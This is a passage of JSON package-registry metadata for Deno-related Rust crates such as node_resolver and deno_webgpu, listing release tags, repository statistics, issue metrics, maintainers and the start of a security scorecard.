github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T07:00:04.290Z","dependent_packages_count":2,"downloads":643666,"downloads_period":"total","dependent_repos_count":13,"rankings":{"downloads":7.995974805262569,"dependent_repos_count":7.157718896586697,"dependent_packages_count":12.232206107154841,"stargazers_count":34.317665038953294,"forks_count":21.27497763197137,"docker_downloads_count":null,"average":16.595708495985754},"purl":"pkg:cargo/node_resolver","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/node_resolver","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/node_resolver","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/node_resolver/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/node_resolver/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T22:29:20.014Z","updated_at":"2022-11-07T22:29:20.014Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-27T21:06:29.547Z","updated_at":"2023-07-27T21:06:29.547Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047758,"name":"deno_webgpu","ecosystem":"cargo","description":"WebGPU implementation for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":228,"first_release_published_at":"2021-03-02T20:35:16.176Z","latest_release_published_at":"2026-08-27T15:20:35.169Z","latest_release_number":"0.225.0","last_synced_at":"2026-09-07T22:58:26.446Z","created_at":"2022-04-12T10:02:24.716Z","updated_at":"2026-09-07T22:58:26.447Z","registry_url":"https://crates.io/crates/deno_webgpu/","install_command":"cargo install deno_webgpu","documentation_url":"https://docs.rs/deno_webgpu/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 